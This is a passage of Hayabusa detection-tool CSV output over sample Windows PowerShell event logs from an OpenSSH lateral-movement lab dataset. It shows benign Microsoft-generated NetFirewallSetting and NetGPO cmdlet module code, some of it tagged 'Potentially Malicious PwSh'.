$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[object]$__cmdletization_value = 
${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias 
'*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.894 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.896 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.897 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.898 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.922 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] 
[switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { 
[object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, 
Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.922 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = 
$myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 
= $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType 
= 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 